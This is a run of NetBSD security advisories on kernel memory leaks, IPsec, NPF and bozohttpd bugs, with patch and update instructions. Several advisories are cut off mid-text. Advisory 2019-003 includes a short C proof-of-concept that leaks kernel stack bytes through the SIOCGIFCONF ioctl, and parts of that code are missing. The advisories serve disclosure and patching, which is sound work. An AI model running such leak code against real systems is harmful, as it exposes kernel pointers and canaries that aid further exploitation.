-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2019-004 = Topic: IPv6 neighbor cache leak on expiration Version:NetBSD-current: affected up to 8.99.51 NetBSD 8.1: affected NetBSD 7.2: not affected NetBSD 7.1.2: not affected NetBSD 7.0.2: not affected Severity: Remote DoS attack can cause the kernel to run out of memory Fixed: NetBSD-current: July 26, 2019 NetBSD-9 branch:not affected NetBSD-8 branch:July 26, 2019 NetBSD-7 branch:not affected NetBSD-7-2 branch: not affected NetBSD-7-1 branch: not affected NetBSD-7-0 branch: not affected Please note that NetBSD releases prior to 7.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract An unprivileged user can cause kernel resource exhaustion by creating many IPv6 neighbor entries, because the GC mechanism will not delete them due to a reference counting bug. An explicit cache flush will delete them, recovering the used memory. Technical Details = The garbage collection (GC) mechanism of IPv6 neighbor caches has a bug in that it doesn't free expired neighbor caches (llentry) because of a missing refcount decrement. The leak occurs when: 1) giving up a neighbor discovery for a cache, 2) giving up a reachability confirmation for a cache, 3) a cache expires, or 4) a forced GC runs. A forced GC destroys cache entries that have overflowed its limit (ip6.neighborgcthresh). The third and fourth cases can be triggered on receiving NS packets so it can be used as a DoS attack that can originate from machines on the same link. Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), and KERNCONF with the name of your kernel configuration file. To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P sys/netinet6/nd6.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: https://www.NetBSD.org/docs/guide/en/chap-kernel.html Thanks To = Internet Initiative Japan Inc. for finding and fixing the vulnerability. More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at https://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2019-004.txt.asc Information about NetBSD and NetBSD security can be found at https://www.NetBSD.org/ https://www.NetBSD.org/Security/ Copyright 2019, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2019-004.txt.asc,v 1.1 2019/08/08 10:18:29 christos Exp $ -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJdS/bCAAoJEIkmHhf170n/ku0P/j/SMhciOSowBzy9L0TX0c+C TIyXqlnOfKWxfoGURIkb0mqEY//lpKXmL6qtXuvtsxgm8xJc9cpEa/yk9qzBtTiw U7yRXCN5Wqv1+Xsh2uun0qMIYesSiTwRrgnoTqLgWvRDIdzOBsyv9BkAf8FCsKhc RMon+BTvAmVTDkKFJgxUQYkgWYjuArnkkhGw789EzRbNAdCbWeoPkEksfeRG3VDC tbtj4FMvuM40XayXhfSia3F+/GvC5bvVx87tkQXCiPum6/dOuTS6GMvqX4fASIPO /27kPVY19OJxmLWR7M1emsxTq7PTV36eOkFDA3RZY5iSZ22YJVcy8zfZTVkHv3wJ FD0buTV8xms6oxw6o9A9TUocaOtVzY7+iExg12do2c4URDxuaX6qer160UlHvxBs mMPStRIJq+2uczMmwFsrLNzl6nad70fv/i//e3MVX5HC/1wk9aTaJIPDH40cU/5Z pd+PvI4veq6ZefkPatiCBKrBTCQkOUMNMQETp7CuF9L49J3QZHV9xFZjtl3F96pk f/AnJuLEn/XZ/kM1dQMItm9w5i9fGnaeQFQ6+sC5VvKxMMVgPFWFCGZa7xAqvP5o ZX3O9tSkSTp2yDWl9SoLDKzpmjK6fkx3IDdxQeH7xpXDvpNl+l+HXUcYS7HJGvPd XhgPZFVcLgSxbl58lWgI =HQQm -END PGP SIGNATURE-
NetBSD Security Advisory 2019-003: Unprivileged user kernel stack disclosure in SIOCGIFCONF
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2019-003 = Topic: Unprivileged user kernel stack disclosure in SIOCGIFCONF Version:NetBSD-current: affected prior to April 15, 2019 NetBSD 8.0: affected NetBSD 7.2: affected NetBSD 7.1.2: affected NetBSD 7.0.2: affected Severity: Local user may cause the kernel to run out of memory Fixed: NetBSD-current: April 15, 2019 NetBSD-8 branch:April 19, 2019 NetBSD-7 branch:April 19, 2019 NetBSD-7-2 branch: April 19, 2019 NetBSD-7-1 branch: April 19, 2019 NetBSD-7-0 branch: April 19, 2019 Please note that NetBSD releases prior to 7.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract An unprivileged user can leak a huge amount of kernel stack by issuing the 'SIOCGIFCONF' ioctl command. Technical Details = Kernel stack can be leaked to an unprivileged user at [1], because 'ifr' is uninitialized and only 'sa->sa_len' are copied to 'ifr.ifr_space'. The size of 'struct ifreq ifr' is 0x90 bytes and 'sa->sa_len' is usually 0x11 bytes. Hence, upto 0x7f bytes can be leaked. This can expose sensitive information, pointers to bypass KASLR, stack canaries which can be used to exploit stack buffer overflows, etc. Proof-Of-Concept: #include #include #include #include #include /* Sample output: 77 6D 30 00 00 00 00 00 00 00 00 00 00 00 00 00 11 12 01 00 06 03 06 00 77 6D 30 08 00 27 56 80 E1 EF CB 08 81 FE FF FF 00 10 00 00 00 00 00 00 20 AE 1C 68 00 80 FF FF 00 00 00 00 00 00 00 00 20 CC 92 1E 01 00 00 00 80 F7 4C 1B 81 FE FF FF 40 AE 1C 68 03 00 00 00 80 F4 4C 1B 81 FE FF FF 80 F4 4C 1B 81 FE FF FF 80 F7 4C 1B 81 FE FF FF 80 F4 4C 1B 81 FE FF FF 10 57 3E 1B 81 FE FF FF 00 52 C4 1E 81 FE FF FF 00 00 00 00 00 00 00 00 */ void hexDump(const void *data, size_t size) { size_t i; for (i = 0; i < size; i++) { printf("%02hhX%c", ((char *)data)[i], (i + 1) % 16 ? ' ' : '\n'); } printf("\n"); } int main(int argc, char *argv[]) { struct ifconf conf; struct ifreq req[1]; int fd; memset(req, 0, sizeof(req)); fd = socket(AF_INET, SOCK_DGRAM, 0); conf.ifc_len = sizeof(req); conf.ifc_buf = req; ioctl(fd, SIOCGIFCONF, ); hexDump(req, sizeof(req)); return 0; } [1] https://github.com/NetBSD/src/blob/trunk/sys/net/if.c#L3378 Solutions and Workarounds = Update the kernel to a fixed version and reboot. To apply a fixed version from a releng build, fetch a fitting kern-GENERIC.tgz from nyftp.netbsd.org and extract the fixed binaries: cd /var/tmp ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/latest/ARCH/binary/sets/kern-GENERIC.tgz cd / tar xzpf /var/tmp/kern-GENERIC.tgz with the following replacements: REL = the release version you are using ARCH = your system's architecture The following instructions describe how to upgrade your kernel by updating your source tree and rebuilding and installing a new version. For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), and KERNCONF with the name of your kernel configuration file. To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P sys/path/to/file.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: http://www.NetBSD.org/docs/guide/en/chap-kernel.html Thanks To = Andy Nguyen for discovering and reporting the issue. More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2019-003.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ . Copyright 2019, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2019-003.txt.asc,v 1.1 2019/05/03 01:33:37 christos Exp $ -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJcy5piAAoJEAZJc6xMSnBuBiYP/0W66ewcPSChlhngqzwsXqHq
NetBSD Security Advisory 2019-002: Unprivileged kernel memory overwrite in mq_send(3)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2019-002 = Topic: Unprivileged kernel memory overwrite in mq_send(3) Version:NetBSD-current: affected prior to April 16, 2019 NetBSD 8.0: affected NetBSD 7.2: affected NetBSD 7.1.2: affected NetBSD 7.0.2: affected Severity: Local user may overwrite kernel memory Fixed: NetBSD-current: April 16, 2019 NetBSD-8 branch:April 16, 2019 NetBSD-7 branch:April 16, 2019 NetBSD-7-1 branch: April 16, 2019 NetBSD-7-0 branch: April 16, 2019 Please note that NetBSD releases prior to 7.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract An unprivileged user can overwrite parts of kernel memory via an unprivileged mq_send(3) system call. Technical Details = Insufficient argument validation in the mq_send(3) system call could cause a copyin(9) operation of too much data, overrunning the kernel target memory. Solutions and Workarounds = Update the kernel to a fixed version and reboot. To apply a fixed version from a releng build, fetch a fitting kern-GENERIC.tgz from nyftp.netbsd.org and extract the fixed binaries: cd /var/tmp ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/latest/ARCH/binary/sets/kern-GENERIC.tgz cd / tar xzpf /var/tmp/kern-GENERIC.tgz with the following replacements: REL = the release version you are using ARCH = your system's architecture The following instructions describe how to upgrade your kernel by updating your source tree and rebuilding and installing a new version. For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), and KERNCONF with the name of your kernel configuration file. To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P sys/path/to/file.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: http://www.NetBSD.org/docs/guide/en/chap-kernel.html Thanks To = Andy Nguyen for discovering and reporting the issue. More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2019-002.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ . Copyright 2019, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2019-002.txt.asc,v 1.1 2019/05/03 01:33:11 christos Exp $ -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJcy5pIAAoJEAZJc6xMSnBuJdAP/i4i5l3HefvFCUIYdt9YsVCW gxQZ6mS/NAgsFS1tHpSYfBqLiYgSAg/uAu1Yo3snni1zQzKhKsZ+1QPalb+oe4AS X+Vw9BXRWcBXCUBHpJS3vPEeg1pMWbQOpBQ0YxC0YVKVo6InWgovCDvUFdQ8hZzv PGbxU7spVNTUJ5+x8/QQw9rJzAZfTRniymLEuRrmFmmn4xPN6KKmi8zhkRTgWEHO AQl3mDVupSUbBID7pLY3FK7dyzbyAcoKptMow42g54Tgl445MiBos7gpVsIzXeAh 9rKwOceGHrzFYf8dawc7bWquxzZ5qH9udDv9XiGoFRCQUAbyGHnrZ9qNYGKgIf0m 1diFrBsLMroSAWLfI/6b7pCbvgXo1NCvePwomYPk1NoIqyVqPZ4YSmGy85aA1e5R LYSmPHCPEMPxP5YPQq1KsXoFNpCUiu1JXoC6CEh28sUijxStSqcx4q29ZweJKzYy PjBNb6FB+h+jDW3z8OzMDo0sYKZKUMaQStLmzqhvBH++zmYEQsKyL6glxdI5jMXr ibW6uBh4nfo6F6d5ao66Cil3dOu1WBSqCgMa5VgyEjpFlAXrvSXHCAcSZDjfNd/V 11LQJvO73MYXSqf01SJ+UEmZqk/fMa3egOEMfBQZc0BoTMBpOzBkGN+ZYVI2ayNO I00zzgJvkKRcWt2Uyqs9 =id0y -END PGP SIGNATURE-
NetBSD Security Advisory 2019-001: Several kernel memory disclosure bugs
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2019-001 = Topic: Several kernel memory disclosure bugs Version:NetBSD-current: source prior to Thu, Jan 31st 2019 NetBSD 8.0: affected NetBSD 7.2: affected NetBSD 7.1: affected NetBSD 7.0: affected Severity: Kernel memory disclosure Fixed: NetBSD-current: Thu, Jan 31st 2019 NetBSD-8 branch:Fri, Feb 1st 2019 NetBSD-7-1 branch: Fri, Feb 1st 2019 NetBSD-7-0 branch: Fri, Feb 1st 2019 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 7.0 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract & Technical Details Several kernel memory disclosure bugs were discovered: 1) Four bytes of kernel stack were leaked in the ntp_gettime system call. 2) Eight bytes of kernel stack were leaked when executing execve. 3) Many bytes of kernel stack were leaked when processing signals on several architectures. 4) Four bytes of kernel stack were leaked in several system calls related to time. 5) An inverted logic in netbsd32 caused some kernel memory bytes to wrongfully be copied to userland. 6) A missing sanity check in a sysctl caused a severe kernel memory disclosure. 7) Four bytes of kernel stack were leaked in the kevent system call. 8) Eight bytes of kernel stack were leaked in the gettimer system call. 9) Two bytes of kernel heap were leaked in the net.rtable sysctl. 10) Many bytes of kernel stack were leaked in the swapctl system call. 11) Sixteen bytes of kernel heap were leaked in the settime system call. 12) Four bytes of kernel heap were leaked in the sigaction_sigtramp system call. 13) Many bytes of kernel stack were leaked in the ptrace system call. 14) Four bytes of kernel stack were leaked in the wait6 system call. 15) Four bytes of kernel stack were leaked in the sigtimedwait system call. 16) Many bytes of kernel stack were leaked in the msgctl system call implemented in the compatibility layers. Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarize how to upgrade your kernel. The patches can be obtained from NetBSD-current with the following commands: ISSUE COMMAND - --- 1) cvs rdiff -u -r1.59 -r1.60 src/sys/kern/kern_ntptime.c 2) cvs rdiff -u -r1.461 -r1.462 src/sys/kern/kern_exec.c 3) cvs rdiff -u -r1.320 -r1.321 src/sys/arch/amd64/amd64/machdep.c 3) cvs rdiff -u -r1.2 -r1.3 src/sys/arch/aarch64/aarch64/netbsd32_machdep.c 3) cvs rdiff -u -r1.351 -r1.352 src/sys/arch/alpha/alpha/machdep.c 3) cvs rdiff -u -r1.116 -r1.117 src/sys/arch/amd64/amd64/netbsd32_machdep.c 3) cvs rdiff -u -r1.50 -r1.51 src/sys/arch/arm/arm/sig_machdep.c 3) cvs rdiff -u -r1.25 -r1.26 src/sys/arch/hppa/hppa/sig_machdep.c 3) cvs rdiff -u -r1.812 -r1.813 src/sys/arch/i386/i386/machdep.c 3) cvs rdiff -u -r1.49 -r1.50 src/sys/arch/m68k/m68k/sig_machdep.c 3) cvs rdiff -u -r1.15 -r1.16 src/sys/arch/mips/mips/netbsd32_machdep.c 3) cvs rdiff -u -r1.23 -r1.24 src/sys/arch/mips/mips/sig_machdep.c 3) cvs rdiff -u -r1.45 -r1.46 src/sys/arch/powerpc/powerpc/sig_machdep.c 3) cvs rdiff -u -r1.1 -r1.2 src/sys/arch/riscv/riscv/sig_machdep.c 3) cvs rdiff -u -r1.105 -r1.106 src/sys/arch/sh3/sh3/sh3_machdep.c 3) cvs rdiff -u -r1.288 -r1.289 src/sys/arch/sparc64/sparc64/machdep.c 3) cvs rdiff -u -r1.110 -r1.111 src/sys/arch/sparc64/sparc64/netbsd32_machdep.c 3) cvs rdiff -u -r1.7 -r1.8 src/sys/arch/usermode/target/i386/cpu_i386.c 3) cvs rdiff -u -r1.6 -r1.7 src/sys/arch/usermode/target/x86_64/cpu_x86_64.c 3) cvs rdiff -u -r1.22 -r1.23 src/sys/arch/vax/vax/sig_machdep.c 4) cvs rdiff -u -r1.189 -r1.190 src/sys/kern/kern_time.c 4) cvs rdiff -u -r1.193 -r1.194 src/sys/kern/kern_time.c 5) cvs rdiff -u -r1.47 -r1.48 src/sys/compat/netbsd32/netbsd32_socket.c 6) cvs rdiff -u -r1.218 -r1.219 src/sys/kern/kern_proc.c 7) cvs rdiff -u -r1.103 -r1.104 src/sys/kern/kern_event.c 8) cvs rdiff -u -r1.190 -r1.191 src/sys/kern/kern_time.c 9) cvs rdiff -u -r1.243 -r1.244 src/sys/net/rtsock.c 10) cvs rdiff -u -r1.177 -r1.178 src/sys/uvm/uvm_swap.c 11) cvs rdiff -u -r1.191 -r1.192 src/sys/kern/kern_time.c 11) cvs rdiff -u -r1.109 -r1.110
NetBSD Security Advisory 2018-009: bozohttpd can allow access to .htpasswd
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2018-009 = Topic: bozohttpd can allow access to .htpasswd Version:NetBSD-current: prior to 2018-11-22 NetBSD 8*: affected NetBSD 7.2*:affected NetBSD 7.1*:affected pkgsrc: bozohttpd package prior to 20181123 Severity: Remote access to encrypted passwords and usernames Fixed: NetBSD-current: November 21, 2018 NetBSD-8 branch:November 24, 2018 NetBSD-7-2 branch: November 24, 2018 NetBSD-7-1 branch: November 24, 2018 pkgsrc-current: bozohttpd-20181123 corrects this issue Please note that NetBSD releases prior to 7.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Under certain circumstances bozohttpd(8) can be tricked into revealing the contents of certain special files. These special files are configuration files for bozohttpd(8) and include the standard .htpasswd file for HTTP Basic Authorisation (RFC-7617), which contains both a list of user names and their encrypted passwords. Technical Details = There were two problems in the handling of bozohttpd special files. The first was a missing check against .htpasswd itself in some cases, which would allow access to the encrypted passwords and username to be seen for the top-level directory. Any empty top-level directory name elided the check for any special files. All requests now check special files. The second was lack of short circuit when the error was detected. The error would be returned, but instead of closing the connection, the contents of the requested file was also returned. This was caused by not checking the return value of bozo_check_special_files(). This function is now marked with the "warn_unused_result" attribute. Solutions and Workarounds = Users of any bozohttpd(8) features using special files should be upgraded to bozohttpd 20181123 or later. There is no workaround except for not using these features, which may mean simply disabling parts of the served tree until the server is upgraded. Consider changing all the passwords used in the .htpasswd as they may be compromised. To apply a fixed version from a releng build, fetch a fitting base.tgz from nyftp.netbsd.org and extract the fixed binaries: cd /var/tmp ftp http://nyftp.netbsd.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/base.tgz cd / tar xzpf /var/tmp/base.tgz ./usr/libexec/httpd with the following replacements: REL = the release version you are using BUILD = the source date of the build. 20181125* and later will fit ARCH = your system's architecture The following instructions describe how to upgrade your bozohttpd binaries by updating your source tree and rebuilding and installing a new version of bozohttpd. * NetBSD-current: Systems running NetBSD-current dated from before 2018-11-21 should be upgraded to NetBSD-current dated 2018-11-22 or later. The following files/directories need to be updated from the netbsd-current CVS branch (aka HEAD): src/libexec/httpd To update from CVS, re-build, and re-install bozohttpd: # cd src # cvs update -r netbsd-8 -d -P src/libexec/httpd # cd src/libexec/httpd # make USETOOLS=no cleandir dependall # make USETOOLS=no install * NetBSD 8.*: Systems running NetBSD 8.* sources dated from before 2018-11-24 should be upgraded from NetBSD 8.* sources dated 2018-11-25 or later. The following files/directories need to be updated from the netbsd-8 branche: src/libexec/httpd To update from CVS, re-build, and re-install bozohttpd: # cd src # cvs update -r netbsd-8 -d -P src/libexec/httpd # cd src/libexec/httpd # make USETOOLS=no cleandir dependall # make USETOOLS=no install * NetBSD 7.*: Systems running NetBSD 7.* sources dated from before 2018-11-24 should be upgraded from NetBSD 7.* sources dated 2018-11-25 or later. The following files/directories need to be updated from the netbsd-7, netbsd-7-2 or netbsd-7-1 branches: src/libexec/httpd To update from CVS, re-build, and re-install bozohttpd: # cd src # cvs update -r -d -P src/libexec/httpd # cd src/libexec/httpd # make USETOOLS=no cleandir dependall # make USETOOLS=no install Thanks To = Thanks to JP for reporting this issue and helping find the problematic
NetBSD Security Advisory 2018-008: Several vulnerabilities in NPF
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2018-008 = Topic: Several vulnerabilities in NPF Version:NetBSD-current: source prior to Thu, Mar 22nd 2018 NetBSD 7.1 - 7.1.2: affected NetBSD 7.0 - 7.0.2: affected NetBSD 6.1 - 6.1.5: affected NetBSD 6.0 - 6.0.6: affected Severity: Remote Rule Bypass, Remote Memory Corruption Fixed: NetBSD-current: Thu, Mar 22nd 2018 NetBSD-7-1 branch: Mon, May 14th 2018 NetBSD-7-0 branch: Mon, May 14th 2018 NetBSD-7 branch:Mon, May 14th 2018 NetBSD-6-1 branch: Thu, May 17th 2018 NetBSD-6-0 branch: n/a NetBSD-6 branch:Thu, May 17th 2018 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 6.0 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Several vulnerabilities were discovered in NPF: 1) Integer overflow when parsing IPv6 headers. 2) Use-after-free when handling ICMP packets. Issue 2 will not be fixed in the netbsd-6-0 branch. Technical Details = 1) An integer overflow could be triggered when NPF was parsing IPv6 options of a packet. This overflow could result in a header length that was smaller than expected, which could allow an incoming packet to bypass L4 rules. 2) A use-after-free could occur when NPF was parsing an ICMP packet. This could result in a rule bypass, a panic, or unexpected behavior. Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarize how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), KERNCONF with the name of your kernel configuration file and VERSION with the file version below File versions containing the fixes: FILE HEAD netbsd-7 netbsd-7-0 netbsd-7-1 -- -- src/sys/net/npf/npf.h 1.55 1.47.2.1 1.47.6.1 1.47.12.1 src/sys/net/npf/npf_inet.c 1.45 1.32.2.3 1.32.6.1 1.32.10.1 src/sys/net/npf/npf_alg_icmp.c 1.29 1.23.2.1 1.23.6.1 1.23.12.1 FILE netbsd-6 netbsd-6-0 netbsd-6-1 -- -- src/sys/net/npf/npf.h 1.14.2.131.14.2.6.4.2 1.14.2.12.2.1 src/sys/net/npf/npf_inet.c 1.10.4.11n/a1.10.4.9.2.2 src/sys/net/npf/npf_alg_icmp.c 1.8.4.8 n/a1.8.4.7.2.1 To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P -r VERSION sys/net/npf/npf.h # cvs update -d -P -r VERSION sys/net/npf/npf_inet.c # cvs update -d -P -r VERSION sys/net/npf/npf_alg_icmp.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: http://www.NetBSD.org/guide/en/chap-kernel.html Thanks To = Maxime Villard for finding and fixing these issues. Revision History 2018-05-24 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2018-008.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ . Copyright 2018, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJbBxHeAAoJEAZJc6xMSnBuCE4QAITWmvcJpv8dANlmBQWElzs7 XRah2CrpujfXeSVuocay80QpTwQTn6Hm4ZAlkYZBlwBVqepPjpwcdb5LmWHzwFgK 33oN/YO7tu/9HFgR9qHHyAnEPT3v7QHxomHgPGPDkAksMOJEj7Mjs0oZQaSiCeoU DF2VG+CNesIajJIz5WJDk+EE0G2YFOvkXYKWT26Ei1qUqeEYgfkK5E+ZGxE0rnE6 IVqubBIoNTmKvnsrv8uGKiQaau5iC2cztsZuCYsDwydYSNxXh5f/c9bfjpghaBw6 G8+3I9P2XGiNnP9wiyffpryktV1aUqtXFOeFjXKdPqmPscXnTWVtGYhPzyluG5Cv 4Led6qGvAzeB+TVHgjFc6pQVPkIyHF3lU4fQmfc3HZ1rsK7kEcGKVYwqCCnH7+jR NABVdzFmEqp4BDm+6JhPQvmi4iB8tTXXjIUWPQSGjkBBo0dQTC+Fom4m8zVF+/fe OqjslnTCw1fDO7byk19gsFXqR1fVOQ0qiVP55e3HKTyq1Y5gNpANJn8im5GOaBto AbGbTfwq/w6nb6nVi2c9J14HOf36FC+ynFltF7IH/F5lFowwQORs3RSLmXgSTGjk cFBpKt4IwfoYdPFBgBxkgoH+WNBmn7FoZWCa8b8mIEONyQNPH7+DiKzkcioj3Ttr
NetBSD Security Advisory 2018-007: Several vulnerabilities in IPsec
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2018-007 = Topic: Several vulnerabilities in IPsec Version:NetBSD-current: source prior to Tue, May 1st 2018 NetBSD 7.1 - 7.1.2: affected NetBSD 7.0 - 7.0.2: affected NetBSD 6.1 - 6.1.5: affected NetBSD 6.0 - 6.0.6: affected Severity: Remote DoS, Remote Memory Corruption Fixed: NetBSD-current: Tue, May 1st 2018 NetBSD-7-1 branch: Thu, May 3rd 2018 NetBSD-7-0 branch: Thu, May 3rd 2018 NetBSD-7 branch:Thu, May 3rd 2018 NetBSD-6-1 branch: Thu, May 3rd 2018 NetBSD-6-0 branch: Thu, May 3rd 2018 NetBSD-6 branch:Thu, May 3rd 2018 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 6.0 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract and Technical Details == Several bugs and vulnerabilities were discovered in the IPsec code. They can be triggered before, or after, authentication or decryption. Before authentication/decryption: 1) In the AH entry point, a length check was missing, and it was possible for a remote attacker to crash the system by sending a very small AH packet. Also, a use-after-free was present in this same entry point. 2) An inverted logic in the common IPsec entry point allowed an attacker to remotely crash the system when both IPsec and forwarding were enabled. 3) A miscomputation in an IPsec function in charge of handling mbufs resulted in the wrong length being stored in the mbuf header. This allowed an attacker to panic the system when at least ESP was active. 4) A sanity check in the IPsec output path was not strong enough and allowed an attacker to remotely panic the system when both IPsec and IPv6 forwarding were enabled. After authentication/decryption: 5) A use-after-free existed in the common Tunnel code. Also, a mistake in pointer initialization allowed an IPv6 packet to bypass the "local address spoofing" check. 6) A missing length check in the common IPsec entry point could allow an attacker to crash the system. 7) A memory leak and a use-after-free bug could allow an attacker to crash the system when both IPv6 and forwarding were enabled. Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarize how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), KERNCONF with the name of your kernel configuration file and VERSION with the file version below File versions containing the fixes: FILE HEAD netbsd-7 netbsd-7-0 netbsd-7-1 -- -- src/sys/netipsec/xform_ah.c 1.80 1.42.4.2 1.42.8.2 1.42.12.2 src/sys/netipsec/ipsec.c 1.1301.63.2.1 1.63.4.1 1.63.8.1 src/sys/netipsec/ipsec_mbuf.c 1.24 1.12.30.11.12.34.1 1.12.42.1 src/sys/netipsec/ipsec_output.c 1.75 1.40.4.1 1.40.8.1 1.40.12.1 src/sys/netipsec/xform_ipip.c 1.56 1.31.2.2 1.31.6.2 1.31.10.2 src/sys/netipsec/ipsec_input.c 1.58 1.32.4.1 1.32.8.1 1.32.12.1 src/sys/netinet6/ip6_forward.c 1.91 1.73.2.3 1.73.2.1.2.2 1.73.2.1.6.2 FILE netbsd-6 netbsd-6-0 netbsd-6-1 -- -- src/sys/netipsec/xform_ah.c 1.37.2.2 1.37.6.2 1.37.8.2 src/sys/netipsec/ipsec.c 1.55.8.1 1.55.12.1 1.55.14.1 src/sys/netipsec/ipsec_mbuf.c 1.12.10.11.12.16.1 1.12.24.1 src/sys/netipsec/ipsec_output.c 1.38.2.1 1.38.8.1 1.38.16.1 src/sys/netipsec/xform_ipip.c 1.28.8.2 1.28.14.2 1.28.22.2 src/sys/netipsec/ipsec_input.c 1.29.2.1 1.29.8.1 1.29.16.1 src/sys/netinet6/ip6_forward.c 1.69.2.2 1.69.6.2 1.69.8.2 To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P -r VERSION sys/netipsec/xform_ah.c # cvs update -d -P -r VERSION sys/netipsec/ipsec.c # cvs update -d -P -r VERSION sys/netipsec/ipsec_mbuf.c # cvs update -d -P -r VERSION sys/netipsec/ipsec_output.c # cvs update -d -P -r VERSION sys/netipsec/xform_ipip.c
NetBSD Security Advisory 2018-006: Several vulnerabilities in the network stack
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2018-006 = Topic: Several vulnerabilities in the network stack Version:NetBSD-current: source prior to Fri, Feb 9th 2018 NetBSD 7.1.2: not affected NetBSD 7.1 - 7.1.1: affected NetBSD 7.0 - 7.0.2: affected NetBSD 6.1 - 6.1.5: affected NetBSD 6.0 - 6.0.6: affected Severity: Remote DoS, Remote Memory Corruption Fixed: NetBSD-current: Fri, Feb 9th 2018 NetBSD-7-1 branch: Sat, Feb 24th 2018 NetBSD-7-0 branch: Sat, Feb 24th 2018 NetBSD-7 branch:Sat, Feb 24th 2018 NetBSD-6-1 branch: Tue, Mar 13th 2018 NetBSD-6-0 branch: Tue, Mar 13th 2018 NetBSD-6 branch:Tue, Mar 13th 2018 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 6.0 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Several vulnerabilities were discovered in the network stack: 1) Several bugs in MPLS. 2) Memory leak in IPv6-NBR. 3) Double free in Pim6. 4) IPv4 source-routed packets allowed by default. 5) Signedness bug in PF. Technical Details = 1) Several possible use-after-frees existed in the MPLS code. This could cause the system to panic. 2) A memory leak existed in the IPv6-NBR entry point. An attacker could cause the kernel to run out of memory. 3) A double-free bug existed in the Pim6 (IPv6 